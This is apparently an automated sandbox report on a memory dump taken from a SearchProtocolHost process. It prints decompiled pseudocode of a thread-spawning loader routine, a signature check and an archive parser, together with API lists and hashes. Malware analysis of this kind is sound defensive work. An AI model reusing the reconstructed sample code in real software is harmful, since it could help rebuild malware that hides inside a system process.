                                                • Opcode ID: 6dc4e46d08ec3d7146ec1e4e1010b82244026f16770f0add499ac9fe76251d4d
                                                • Instruction ID: 6c8a2bc5d3d27379f05ae5ec369fef530ec99f5b16b2fa09f62b7548e53fb410
                                                • Opcode Fuzzy Hash: 6dc4e46d08ec3d7146ec1e4e1010b82244026f16770f0add499ac9fe76251d4d
                                                • Instruction Fuzzy Hash: F741A0717002018BEB18DE2CC884769B7E5EB94318F19827DDD589B25ADB73F84A8791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 02FA93E0 Relevance: 19.6, APIs: 13, Instructions: 68threadsleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E02FA93E0(void* __eflags) {
				void* _t3;
				long _t15;

				FreeConsole();
				SetUnhandledExceptionFilter(E02FA9300); // executed
				_t3 = E02FA9310(); // executed
				if(_t3 != 0) {
					Sleep(0xbb8); // executed
					CreateThread(0, 0, E02FAAFC0, 0, 0, 0); // executed
					CreateThread(0, 0, E02FA6D40, 0, 0, 0); // executed
					CreateThread(0, 0, E02FAB470, 0, 0, 0); // executed
					CreateThread(0, 0, E02FA7C20, 0, 0, 0); // executed
					CreateThread(0, 0, E02FA5200, 0, 0, 0); // executed
					_t15 = GetTickCount();
					if(GetTickCount() - _t15 >= 0xa4cb80) {
						L4:
						ExitProcess(0);
					} else {
						goto L3;
					}
					do {
						L3:
						Sleep(0xea60); // executed
					} while (GetTickCount() - _t15 < 0xa4cb80);
					goto L4;
				}
				return 0;
			}





                                                0x02fa93e3
                                                0x02fa93ee
                                                0x02fa93f4
                                                0x02fa93fb
                                                0x02fa940e
                                                0x02fa9425
                                                0x02fa9436
                                                0x02fa9447
                                                0x02fa9458
                                                0x02fa9469
                                                0x02fa9473
                                                0x02fa947e
                                                0x02fa9492
                                                0x02fa9494
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9480
                                                0x02fa9480
                                                0x02fa9485
                                                0x02fa948b
                                                0x00000000
                                                0x02fa9480
                                                0x02fa9402

                                                APIs
                                                • FreeConsole.KERNEL32 ref: 02FA93E3
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00009300), ref: 02FA93EE
                                                  • Part of subcall function 02FA9310: WSAStartup.WS2_32(00000202,?), ref: 02FA9335
                                                  • Part of subcall function 02FA9310: CreateMutexA.KERNELBASE ref: 02FA937F
                                                  • Part of subcall function 02FA9310: GetLastError.KERNEL32 ref: 02FA9387
                                                  • Part of subcall function 02FA9310: ReleaseMutex.KERNEL32(00000000), ref: 02FA939E
                                                  • Part of subcall function 02FA9310: CloseHandle.KERNEL32(00000000), ref: 02FA93A5
                                                • Sleep.KERNELBASE(00000BB8), ref: 02FA940E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000AFC0,00000000,00000000,00000000), ref: 02FA9425
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00006D40,00000000,00000000,00000000), ref: 02FA9436
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_0000B470,00000000,00000000,00000000), ref: 02FA9447
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00007C20,00000000,00000000,00000000), ref: 02FA9458
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005200,00000000,00000000,00000000), ref: 02FA9469
                                                • GetTickCount.KERNEL32 ref: 02FA9471
                                                • GetTickCount.KERNEL32 ref: 02FA9475
                                                • Sleep.KERNELBASE(0000EA60), ref: 02FA9485
                                                • GetTickCount.KERNEL32 ref: 02FA9487
                                                • ExitProcess.KERNEL32 ref: 02FA9494
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Create$Thread$CountTick$MutexSleep$CloseConsoleErrorExceptionExitFilterFreeHandleLastProcessReleaseStartupUnhandled
                                                • String ID:
                                                • API String ID: 4116069078-0
                                                • Opcode ID: 8e6c873aba6480eb3df2177997116aa5d298d352a12b2eb6df8efaa111300ea0
                                                • Instruction ID: 5606f54a757d2e597707b81b91fc944c2b68a9ff58d9a0c450455ac809545052
                                                • Opcode Fuzzy Hash: 8e6c873aba6480eb3df2177997116aa5d298d352a12b2eb6df8efaa111300ea0
                                                • Instruction Fuzzy Hash: 64111A71BC432876F67026B15D6BF4D6E14AB40FE5F704822F70AFE0C089D0784589AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA4920 Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 28%
                                                			E02FA4920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long* _v12;
				long* _v16;
				int _t16;
				int _t18;
				char* _t20;
				intOrPtr _t21;
				void* _t24;
				void* _t27;
				long* _t30;

				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t16 != 0) {
					_t18 = CryptImportKey(_v12, 0x2fd0ce0, 0x94, 0, 0,  &_v16); // executed
					if(_t18 == 0) {
						goto L1;
					} else {
						_t20 =  &_v8;
						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20); // executed
						if(_t20 == 0) {
							goto L1;
						} else {
							__imp__CryptHashData(_v8, _a4, _a8, 0);
							if(_t20 == 0) {
								goto L1;
							} else {
								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24); // executed
								_t21 = _v8;
								_t27 =  !=  ? 1 : 0;
								if(_t21 != 0) {
									__imp__CryptDestroyHash(_t21);
								}
								_t30 = _v12;
								if(_t30 != 0) {
									CryptReleaseContext(_t30, 0);
								}
								return _t27;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}













                                                0x02fa4935
                                                0x02fa493d
                                                0x02fa495a
                                                0x02fa4962
                                                0x00000000
                                                0x02fa4964
                                                0x02fa4964
                                                0x02fa4974
                                                0x02fa497c
                                                0x00000000
                                                0x02fa497e
                                                0x02fa4989
                                                0x02fa4991
                                                0x00000000
                                                0x02fa4993
                                                0x02fa49a6
                                                0x02fa49b1
                                                0x02fa49b9
                                                0x02fa49be
                                                0x02fa49c1
                                                0x02fa49c1
                                                0x02fa49c7
                                                0x02fa49cc
                                                0x02fa49d1
                                                0x02fa49d1
                                                0x02fa49dd
                                                0x02fa49dd
                                                0x02fa4991
                                                0x02fa497c
                                                0x02fa493f
                                                0x02fa493f
                                                0x02fa4944
                                                0x02fa4944

                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02FA4935
                                                • CryptImportKey.ADVAPI32(00000000,02FD0CE0,00000094,00000000,00000000,?), ref: 02FA495A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 02FA4974
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 02FA4989
                                                • CryptVerifySignatureA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?), ref: 02FA49A6
                                                • CryptDestroyHash.ADVAPI32(?), ref: 02FA49C1
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02FA49D1
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 5e4b41e264148259177fd840382b71da5d4392294a69fe08938e60b1845534ff
                                                • Instruction ID: e024663cb60d53faf2921e66e951af018ede4afdf125f3b48bfa8768df4b829e
                                                • Opcode Fuzzy Hash: 5e4b41e264148259177fd840382b71da5d4392294a69fe08938e60b1845534ff
                                                • Instruction Fuzzy Hash: CA214275FC0309BBEF208EA0DD15FADBB79BB08B90F600454BB04F60D0D7B1A6249A54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAF4E0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 467COMMONCrypto
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 340 2faf4e0-2faf510 341 2fafae2-2fafafb call 2fb0a5d 340->341 342 2faf516-2faf51b 340->342 342->341 343 2faf521-2faf525 342->343 345 2faf52c-2faf539 343->345 346 2faf527 call 2faf2d0 343->346 349 2faf53b-2faf53e 345->349 350 2faf565-2faf568 345->350 346->345 351 2faf56a-2faf5e5 call 2fb0a5d 349->351 352 2faf540-2faf562 call 2fb0a5d 349->352 350->351 353 2faf5e8-2faf5ed 350->353 354 2faf5ef call 2faec60 353->354 355 2faf5f4-2faf5f9 353->355 354->355 360 2faf5fb-2faf5fd 355->360 361 2faf654-2faf68e call 2fae7c0 call 2faeca0 355->361 363 2faf600-2faf604 360->363 373 2faf6ac-2faf6b6 call 2fae170 361->373 374 2faf690-2faf6a9 call 2fb0a5d 361->374 366 2faf649-2faf64e 363->366 367 2faf606-2faf60a 363->367 366->363 370 2faf650 366->370 367->366 369 2faf60c-2faf613 367->369 369->366 372 2faf615-2faf639 call 2fae7c0 369->372 370->361 378 2faf63e-2faf646 372->378 380 2faf6bb-2faf6c0 373->380 378->366 381 2faf6fa-2faf713 call 2fb0a5d 380->381 382 2faf6c2-2faf6ef call 2fb0ab4 call 2fae200 380->382 389 2faf6f1-2faf6f7 call 2fb0aaf 382->389 390 2faf716-2faf71f 382->390 389->381 391 2faf720-2faf733 390->391 391->391 394 2faf735-2faf73c 391->394 395 2faf740-2faf744 394->395 396 2faf751-2faf753 395->396 397 2faf746-2faf74a 395->397 399 2faf758-2faf75a 396->399 400 2faf755-2faf756 396->400 397->396 398 2faf74c-2faf74f 397->398 398->395 401 2faf75f-2faf76f call 2fb5fff 399->401 402 2faf75c-2faf75d 399->402 400->395 405 2faf771-2faf774 401->405 406 2faf776-2faf786 call 2fb5fff 401->406 402->395 405->395 409 2faf788-2faf78b 406->409 410 2faf78d-2faf79d call 2fb5fff 406->410 409->395 413 2faf79f-2faf7a2 410->413 414 2faf7a4-2faf7b4 call 2fb5fff 410->414 413->395 417 2faf7bb-2faf7be 414->417 418 2faf7b6-2faf7b9 414->418 419 2faf7c0-2faf7cb 417->419 418->395 419->419 420 2faf7cd-2faf801 419->420 421 2faf812-2faf847 420->421 422 2faf803-2faf806 420->422 424 2faf84b-2faf864 421->424 422->421 423 2faf808-2faf80b 422->423 423->421 425 2faf80d-2faf810 423->425 426 2faf86d-2faf872 424->426 427 2faf866 424->427 425->421 425->424 428 2faf87b-2faf87d 426->428 429 2faf874 426->429 427->426 430 2faf87f 428->430 431 2faf886-2faf88b 428->431 429->428 430->431 432 2faf88d 431->432 433 2faf894-2faf901 call 2faf350 LocalFileTimeToFileTime 431->433 432->433 436 2fafa9f 433->436 437 2faf907-2faf913 433->437 439 2fafaa3-2fafaa5 436->439 438 2faf924-2faf93d 437->438 440 2faf940-2faf944 438->440 441 2fafab0-2fafadf call 2fb0a5d 439->441 442 2fafaa7-2fafaad call 2fb0aaf 439->442 443 2faf960-2faf962 440->443 444 2faf946-2faf948 440->444 442->441 450 2faf965-2faf967 443->450 447 2faf94a-2faf950 444->447 448 2faf95c-2faf95e 444->448 447->443 452 2faf952-2faf95a 447->452 448->450 453 2faf988-2faf9ba 450->453 454 2faf969-2faf981 450->454 452->440 452->448 457 2fafa09-2fafa0b 453->457 458 2faf9bc-2fafa05 453->458 455 2faf983 454->455 456 2faf920 454->456 455->439 456->438 459 2fafa0d-2fafa4f 457->459 460 2fafa52-2fafa57 457->460 458->457 459->460 460->436 461 2fafa59-2fafa9c 460->461 461->436
                                                C-Code - Quality: 84%
                                                			E02FAF4E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int _a4, void* _a8) {
				signed int _v8;
				char _v276;
				char _v540;
				unsigned int _v568;
				signed int _v592;
				signed int _v596;
				unsigned int _v604;
				unsigned int _v620;
				struct _FILETIME _v628;
				struct _FILETIME _v636;
				intOrPtr* _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				char _v658;
				char _v659;
				signed int _v660;
				signed int _v664;
				void* __esi;
				signed int _t195;
				signed int _t199;
				signed int _t204;
				signed int _t205;
				signed int _t208;
				void* _t209;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t235;
				signed int _t244;
				signed int _t250;
				signed int _t253;
				signed int _t254;
				signed char _t255;
				signed int _t262;
				signed int _t264;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t282;
				signed int _t289;
				signed int _t294;
				signed int _t296;
				void* _t307;
				signed int _t312;
				signed int _t319;
				signed int _t328;
				signed int _t330;
				signed char _t334;
				long _t338;
				signed int _t339;
				intOrPtr* _t345;
				signed int _t348;
				signed int _t356;
				signed int _t361;
				unsigned int _t380;
				unsigned int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t390;
				intOrPtr _t392;
				signed int* _t395;
				signed int _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				void* _t414;
				void* _t416;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t421;
				signed int _t422;
				signed int _t424;
				signed int _t427;
				signed int _t428;
				void* _t430;

				_t424 = (_t422 & 0xfffffff8) - 0x294;
				_t195 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t195 ^ _t424;
				_t307 = _a8;
				_t409 = _a4;
				_v652 = _t307;
				_t395 = __ecx;
				_v640 = __ecx;
				if(_t409 < 0xffffffff) {
					L81:
					_pop(_t410);
					__eflags = _v8 ^ _t424;
					return E02FB0A5D(_v8 ^ _t424, _t410);
				} else {
					_t318 =  *__ecx;
					if(_t409 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L81;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E02FAF2D0(_t318, __edx);
						}
						_t395[1] = 0xffffffff;
						if(_t409 != _t395[0x4d]) {
							__eflags = _t409 - 0xffffffff;
							if(_t409 != 0xffffffff) {
								_t319 =  *_t395;
								__eflags = _t409 -  *((intOrPtr*)(_t319 + 0x10));
								if(_t409 <  *((intOrPtr*)(_t319 + 0x10))) {
									E02FAEC60(_t319);
								}
								_t199 =  *_t395;
								__eflags =  *((intOrPtr*)(_t199 + 0x10)) - _t409;
								if( *((intOrPtr*)(_t199 + 0x10)) < _t409) {
									_t312 = _t409;
									do {
										_t409 =  *_t395;
										__eflags = _t409;
										if(_t409 != 0) {
											__eflags =  *(_t409 + 0x18);
											if( *(_t409 + 0x18) != 0) {
												_t392 =  *((intOrPtr*)(_t409 + 0x10)) + 1;
												__eflags = _t392 -  *((intOrPtr*)(_t409 + 4));
												if(_t392 !=  *((intOrPtr*)(_t409 + 4))) {
													 *((intOrPtr*)(_t409 + 0x10)) = _t392;
													 *((intOrPtr*)(_t409 + 0x14)) =  *((intOrPtr*)(_t409 + 0x14)) +  *((intOrPtr*)(_t409 + 0x48)) + 0x2e +  *((intOrPtr*)(_t409 + 0x50)) +  *((intOrPtr*)(_t409 + 0x4c));
													_t294 = E02FAE7C0(_t409, _t409 + 0x28, _t409 + 0x78, 0, 0); // executed
													_t424 = _t424 - 0x10 + 0x1c;
													asm("sbb eax, eax");
													_t296 =  ~_t294 + 1;
													__eflags = _t296;
													 *(_t409 + 0x18) = _t296;
												}
											}
										}
										_t289 =  *_t395;
										__eflags =  *((intOrPtr*)(_t289 + 0x10)) - _t312;
									} while ( *((intOrPtr*)(_t289 + 0x10)) < _t312);
									_t307 = _v652;
								}
								E02FAE7C0( *_t395,  &_v620, 0,  &_v540, 0x104); // executed
								_t204 = E02FAECA0( *_t395,  &_v648, __eflags,  &_v652,  &_v664); // executed
								_t427 = _t424 - 0x10 + 0x24;
								__eflags = _t204;
								if(_t204 == 0) {
									_t205 = E02FAE170( *( *_t395), _v652, 0); // executed
									_t428 = _t427 + 4;
									__eflags = _t205;
									if(__eflags != 0) {
										L24:
										_pop(_t411);
										__eflags = _v8 ^ _t428;
										return E02FB0A5D(_v8 ^ _t428, _t411);
									} else {
										_push(_v664);
										_t208 = E02FB0AB4(_t409, __eflags);
										_t412 = _t208;
										_v656 = _t208;
										_t209 = E02FAE200(_t208, 1, _v664,  *( *_t395));
										_t430 = _t428 + 0xc;
										__eflags = _t209 - _v664;
										if(_t209 == _v664) {
											_t328 = 0;
											__eflags = 0;
											 *_t307 =  *( *_t395 + 0x10);
											do {
												_t212 =  *((intOrPtr*)(_t430 + _t328 + 0x88));
												_t328 = _t328 + 1;
												 *((char*)(_t430 + _t328 + 0x18f)) = _t212;
												__eflags = _t212;
											} while (_t212 != 0);
											_t413 =  &_v276;
											while(1) {
												_t213 =  *_t413;
												__eflags = _t213;
												if(_t213 == 0) {
													goto L31;
												}
												L29:
												__eflags =  *((char*)(_t413 + 1)) - 0x3a;
												if( *((char*)(_t413 + 1)) == 0x3a) {
													_t413 = _t413 + 2;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												L31:
												__eflags = _t213 - 0x5c;
												if(_t213 == 0x5c) {
													_t413 = _t413 + 1;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												__eflags = _t213 - 0x2f;
												if(_t213 == 0x2f) {
													_t413 = _t413 + 1;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t214 = E02FB5FFF(_t413, "\\..\\");
												_t430 = _t430 + 8;
												__eflags = _t214;
												if(_t214 != 0) {
													_t61 = _t214 + 4; // 0x4
													_t413 = _t61;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t215 = E02FB5FFF(_t413, "\\../");
												_t430 = _t430 + 8;
												__eflags = _t215;
												if(_t215 != 0) {
													_t62 = _t215 + 4; // 0x4
													_t413 = _t62;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
												}
												_t216 = E02FB5FFF(_t413, "/../");
												_t430 = _t430 + 8;
												__eflags = _t216;
												if(_t216 != 0) {
													_t63 = _t216 + 4; // 0x4
													_t413 = _t63;
													while(1) {
														_t213 =  *_t413;
														__eflags = _t213;
														if(_t213 == 0) {
															goto L31;
														}
														goto L29;
													}
													goto L31;
												}
												_t217 = E02FB5FFF(_t413, "/..\\");
												_t430 = _t430 + 8;
												__eflags = _t217;
												if(_t217 != 0) {
													_t64 = _t217 + 4; // 0x4
													_t413 = _t64;
													continue;
												}
												_t65 = _t307 + 4; // 0x2fa5092
												_t330 = _t65 - _t413;
												__eflags = _t330;
												do {
													_t218 =  *_t413;
													_t413 = _t413 + 1;
													 *((char*)(_t330 + _t413 - 1)) = _t218;
													__eflags = _t218;
												} while (_t218 != 0);
												_t380 = _v568;
												_v660 = _t380 >> 0x0000001e & 0xffffff01;
												_t334 =  !(_t380 >> 0x17) & 0x00000001;
												_t223 = _v620 >> 8;
												_v648 = 0;
												_v652 = 0;
												_v644 = 1;
												__eflags = _t223;
												if(_t223 == 0) {
													L49:
													_t334 = _t380 & 0x00000001;
													_v648 = _t380 >> 0x00000001 & 0xffffff01;
													_v652 = _t380 >> 0x00000002 & 0xffffff01;
													_v660 = _t380 >> 0x00000004 & 0x00000001;
													_t235 = _t380 >> 0x00000005 & 0xffffff01;
													__eflags = _t235;
													_v644 = _t235;
												} else {
													__eflags = _t223 - 7;
													if(_t223 == 7) {
														goto L49;
													} else {
														__eflags = _t223 - 0xb;
														if(_t223 == 0xb) {
															goto L49;
														} else {
															__eflags = _t223 - 0xe;
															if(_t223 == 0xe) {
																goto L49;
															}
														}
													}
												}
												__eflags = _v660;
												_t237 =  !=  ? 0x10 : 0;
												__eflags = _v644;
												 *(_t307 + 0x108) =  !=  ? 0x10 : 0;
												if(_v644 != 0) {
													_t82 = _t307 + 0x108;
													 *_t82 =  *(_t307 + 0x108) | 0x00000020;
													__eflags =  *_t82;
												}
												__eflags = _v648;
												if(_v648 != 0) {
													_t85 = _t307 + 0x108;
													 *_t85 =  *(_t307 + 0x108) | 0x00000002;
													__eflags =  *_t85;
												}
												__eflags = _t334;
												if(_t334 != 0) {
													_t87 = _t307 + 0x108;
													 *_t87 =  *(_t307 + 0x108) | 0x00000001;
													__eflags =  *_t87;
												}
												__eflags = _v652;
												if(_v652 != 0) {
													_t90 = _t307 + 0x108;
													 *_t90 =  *(_t307 + 0x108) | 0x00000004;
													__eflags =  *_t90;
												}
												_t382 = _v604;
												 *(_t307 + 0x124) = _v596;
												 *(_t307 + 0x128) = _v592;
												_v636.dwLowDateTime = E02FAF350(_t382 >> 0x10, _t382);
												_v636.dwHighDateTime = _t382;
												LocalFileTimeToFileTime( &_v636,  &_v628);
												_t338 = _v628.dwLowDateTime;
												_t414 = 0;
												__eflags = _v664 - 4;
												_t244 = _v628.dwHighDateTime;
												 *(_t307 + 0x10c) = _t338;
												 *(_t307 + 0x110) = _t244;
												 *(_t307 + 0x114) = _t338;
												 *(_t307 + 0x118) = _t244;
												 *(_t307 + 0x11c) = _t338;
												 *(_t307 + 0x120) = _t244;
												if(_v664 <= 4) {
													L77:
													_t339 = _v656;
												} else {
													_t250 = _v656;
													_v658 = 0;
													_t383 = _t250 + 1;
													while(1) {
														L61:
														_t345 = "UT";
														_v660 =  *(_t414 + _t250) & 0x000000ff;
														_v659 =  *(_t383 + _t414) & 0x000000ff;
														_t253 =  &_v660;
														while(1) {
															_t384 =  *_t253;
															__eflags = _t384 -  *_t345;
															if(_t384 !=  *_t345) {
																break;
															}
															__eflags = _t384;
															if(_t384 == 0) {
																L66:
																_t254 = 0;
															} else {
																_t390 =  *((intOrPtr*)(_t253 + 1));
																_t120 = _t345 + 1; // 0x25000054
																__eflags = _t390 -  *_t120;
																if(_t390 !=  *_t120) {
																	break;
																} else {
																	_t253 = _t253 + 2;
																	_t345 = _t345 + 2;
																	__eflags = _t390;
																	if(_t390 != 0) {
																		continue;
																	} else {
																		goto L66;
																	}
																}
															}
															L68:
															__eflags = _t254;
															if(_t254 == 0) {
																_t385 = _v656;
																_v660 = 0x989680;
																_t255 =  *(_t414 + _t385 + 4) & 0x000000ff;
																_t417 = _t414 + 5;
																_v664 = _t255;
																_v664 = _v664 >> 2;
																_v664 = _v664 & 0x00000001;
																_t348 = _t255 >> 0x00000001 & 0xffffff01;
																_v652 = _t348;
																__eflags = _t255 & 0x00000001;
																if((_t255 & 0x00000001) != 0) {
																	_t361 =  *(_t417 + _t385) & 0x000000ff;
																	_t279 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
																	_t417 = _t417 + 4;
																	_t280 = _t279 | _t361;
																	_t282 = _t280 * _v660 + 0xd53e8000;
																	__eflags = _t282;
																	 *(_t307 + 0x11c) = _t282;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x120) = _t280 * _v660 >> 0x20;
																	_t385 = _v656;
																	_t348 = _v652;
																}
																__eflags = _t348;
																if(_t348 != 0) {
																	_t356 =  *(_t417 + _t385) & 0x000000ff;
																	_t270 = ((( *(_t417 + _t385 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _t385 + 1) & 0x000000ff) << 8;
																	_t417 = _t417 + 4;
																	_t271 = _t270 | _t356;
																	_t273 = _t271 * _v660 + 0xd53e8000;
																	__eflags = _t273;
																	 *(_t307 + 0x10c) = _t273;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x110) = _t271 * _v660 >> 0x20;
																}
																__eflags = _v664;
																if(_v664 != 0) {
																	_t262 = ((( *(_t417 + _v656 + 3) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 2) & 0x000000ff) << 0x00000008 |  *(_t417 + _v656 + 1) & 0x000000ff) << 0x00000008 |  *(_t417 + _t386) & 0x000000ff;
																	_t264 = _t262 * _v660 + 0xd53e8000;
																	__eflags = _t264;
																	 *(_t307 + 0x114) = _t264;
																	asm("adc edx, 0x19db1de");
																	 *(_t307 + 0x118) = _t262 * _v660 >> 0x20;
																}
																goto L77;
															} else {
																_t339 = _v656;
																_t383 = _t339 + 1;
																_t414 = _t414 + ( *(_t414 + _t339 + 2) & 0x000000ff) + 4;
																_t125 = _t414 + 4; // 0x4
																__eflags = _t125 - _v664;
																if(_t125 < _v664) {
																	_t250 = _v656;
																	goto L61;
																} else {
																}
															}
															goto L78;
														}
														asm("sbb eax, eax");
														_t254 = _t253 | 0x00000001;
														__eflags = _t254;
														goto L68;
													}
												}
												L78:
												__eflags = _t339;
												if(_t339 != 0) {
													E02FB0AAF(_t339);
													_t430 = _t430 + 4;
												}
												 *(memcpy( &(_t395[2]), _t307, 0x4b << 2) + 0x134) = _a4;
												_pop(_t416);
												__eflags = _v8 ^ _t430 + 0xc;
												return E02FB0A5D(_v8 ^ _t430 + 0xc, _t416);
												goto L82;
											}
										} else {
											E02FB0AAF(_t412);
											_t428 = _t430 + 4;
											goto L24;
										}
									}
								} else {
									_pop(_t418);
									__eflags = _v8 ^ _t427;
									return E02FB0A5D(_v8 ^ _t427, _t418);
								}
							} else {
								goto L8;
							}
						} else {
							if(_t409 == 0xffffffff) {
								L8:
								 *_t307 =  *( *_t395 + 4);
								 *((char*)(_t307 + 4)) = 0;
								 *(_t307 + 0x108) = 0;
								 *(_t307 + 0x10c) = 0;
								 *(_t307 + 0x110) = 0;
								 *(_t307 + 0x114) = 0;
								 *(_t307 + 0x118) = 0;
								 *(_t307 + 0x11c) = 0;
								 *(_t307 + 0x120) = 0;
								 *(_t307 + 0x124) = 0;
								 *(_t307 + 0x128) = 0;
								_pop(_t419);
								__eflags = _v8 ^ _t424;
								return E02FB0A5D(_v8 ^ _t424, _t419);
							} else {
								memcpy(_t307,  &(_t395[2]), 0x4b << 2);
								_pop(_t421);
								return E02FB0A5D(_v8 ^ _t424 + 0xc, _t421);
							}
						}
					}
				}
				L82:
			}

























































































                                                0x02faf4e6
                                                0x02faf4ec
                                                0x02faf4f3
                                                0x02faf4fb
                                                0x02faf4ff
                                                0x02faf502
                                                0x02faf507
                                                0x02faf509
                                                0x02faf510
                                                0x02fafae2
                                                0x02fafaef
                                                0x02fafaf1
                                                0x02fafafb
                                                0x02faf516
                                                0x02faf516
                                                0x02faf51b
                                                0x00000000
                                                0x02faf521
                                                0x02faf525
                                                0x02faf527
                                                0x02faf527
                                                0x02faf52c
                                                0x02faf539
                                                0x02faf565
                                                0x02faf568
                                                0x02faf5e8
                                                0x02faf5ea
                                                0x02faf5ed
                                                0x02faf5ef
                                                0x02faf5ef
                                                0x02faf5f4
                                                0x02faf5f6
                                                0x02faf5f9
                                                0x02faf5fb
                                                0x02faf600
                                                0x02faf600
                                                0x02faf602
                                                0x02faf604
                                                0x02faf606
                                                0x02faf60a
                                                0x02faf60f
                                                0x02faf610
                                                0x02faf613
                                                0x02faf626
                                                0x02faf629
                                                0x02faf639
                                                0x02faf63e
                                                0x02faf643
                                                0x02faf645
                                                0x02faf645
                                                0x02faf646
                                                0x02faf646
                                                0x02faf613
                                                0x02faf60a
                                                0x02faf649
                                                0x02faf64b
                                                0x02faf64b
                                                0x02faf650
                                                0x02faf650
                                                0x02faf66c
                                                0x02faf684
                                                0x02faf689
                                                0x02faf68c
                                                0x02faf68e
                                                0x02faf6b6
                                                0x02faf6bb
                                                0x02faf6be
                                                0x02faf6c0
                                                0x02faf6fa
                                                0x02faf700
                                                0x02faf709
                                                0x02faf713
                                                0x02faf6c2
                                                0x02faf6c2
                                                0x02faf6c6
                                                0x02faf6d0
                                                0x02faf6d7
                                                0x02faf6e3
                                                0x02faf6e8
                                                0x02faf6eb
                                                0x02faf6ef
                                                0x02faf718
                                                0x02faf718
                                                0x02faf71d
                                                0x02faf720
                                                0x02faf720
                                                0x02faf727
                                                0x02faf72a
                                                0x02faf731
                                                0x02faf731
                                                0x02faf735
                                                0x02faf740
                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x02faf746
                                                0x02faf746
                                                0x02faf74a
                                                0x02faf74c
                                                0x02faf740
                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf744
                                                0x02faf740
                                                0x02faf751
                                                0x02faf751
                                                0x02faf753
                                                0x02faf755
                                                0x02faf740
                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf744
                                                0x02faf740
                                                0x02faf758
                                                0x02faf75a
                                                0x02faf75c
                                                0x02faf740
                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf744
                                                0x02faf740
                                                0x02faf765
                                                0x02faf76a
                                                0x02faf76d
                                                0x02faf76f
                                                0x02faf771
                                                0x02faf771
                                                0x02faf740
